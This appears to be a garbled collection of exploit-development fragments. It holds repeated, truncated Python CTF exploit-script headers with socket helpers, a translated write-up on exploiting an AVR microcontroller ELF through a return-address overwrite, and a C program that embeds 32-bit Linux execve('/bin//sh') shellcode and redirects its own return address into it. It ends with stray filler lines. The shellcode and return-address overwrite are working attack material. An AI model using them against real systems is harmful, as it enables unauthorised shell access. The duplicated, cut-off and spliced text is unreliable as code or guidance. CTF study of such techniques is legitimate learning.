#!/usr/bin/python
# -*- coding:utf-8 -*-
import socket, struct, telnetlib
# --- common funcs ---
def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    return s, s.makefile('rw', bufsize=0)
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct, socket, sys, telnetlib
def sock(remoteip="127.0.0.1", remoteport=1234):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    return s, s.makefile('rw', bufsize=0)
def read_until(f, delim='\n'):
Exploiting an ELF binary for the Atmel AVR (the microcontroller known from Arduino)
(Overview)
There are traits that differ from x86, such as how registers are handled and the stack being an "empty" stack (the stack pointer points to the next free slot), but I'll skip those here.
The most distinctive trait is that it is a Harvard architecture.
The ROM holding machine code and the RAM holding data are placed in entirely separate address spaces, so reading the bytes of the machine code requires special instructions.
(At first I kept reading from 0x1800 in the data area and got mysterious data back, so I got stuck here.)
The lpm instruction that appears in the binary is exactly that instruction.
Another point whose behaviour is hard to grasp: I don't know how real hardware behaves, but in the simulator I confirmed that when ret pops an invalid address no exception is raised and execution simply continues with the instructions that follow.
With that understood, I derived the offset to the return address from the difference in behaviour between the case where ret overwrites the PC and the case where it doesn't (you could also find it with the debugger's simulator, or by reading the disassembly carefully).
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct, socket, sys, telnetlib
from libformatstr import FormatStr
def sock(remoteip="127.0.0.1", remoteport=1234):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    return s, s.makefile('rw', bufsize=0)
#include <stdio.h>
// gcc exec_shellcode.c -o exec_shellcode -m32 -z execstack -fno-stack-protector
// 32-bit Linux execve("/bin//sh") shellcode; needs an executable stack to run from a local array
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
            "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(){
    int a=0xdeadbeef;
    // pointer arithmetic advances by sizeof(int): &a + 2 lands on the saved return address
    // in this unprotected frame, so the write redirects the return into sc
    *(int *)(&a + 2) = sc;
Do it properly
test content |
There isn't any